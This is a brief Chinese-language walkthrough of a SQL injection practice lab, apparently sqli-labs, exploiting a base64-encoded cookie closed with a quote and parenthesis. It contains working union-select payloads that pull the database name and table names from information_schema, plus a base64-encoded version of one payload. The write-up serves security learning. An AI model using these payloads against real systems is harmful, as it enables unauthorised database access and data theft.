cookie注入 引号和括号闭合 base64编码
0X01
看了题目应该是 cookie注入 闭合是') 那么base64编码是什么鬼??
看源码解决吧
setcookie()函数的介绍
然后在查询比对与之前真确的时候输入的cookie是否符合
0X01构造语句进行注入
那我们的目的是将 输入的数据 通过base64解码后 变成(‘’)要填充的数据
所以直接把我们的语句先base64加密在放进去就行了 那我们来构造语句
在线编码的地址
1‘) union select 1,database(),3#
但是好像失败了 对不是好像 是确实失败了
why?
在线url编码的工具
http://tool.chinaz.com/tools/urlencode.aspx
看这里 = 好像被url加密了 是不是我们的符号不能直接base?
尝试一下 验证一下
不是的 是我操作失误了
那我们继续回归正题
') union select 1,2,3#
这里知道 2,3 是显示位置
那我们的语句就可以从2,3下手了
这里直接演示一下爆表名
') union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3#
JykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBsaW1pdCAwLDEpLDMj
成功绕过
其他的构造方法就是以此类推 学到这里了 应该不需要多讲了 所以 我们 到此 over
切记 少就是多 慢就是快
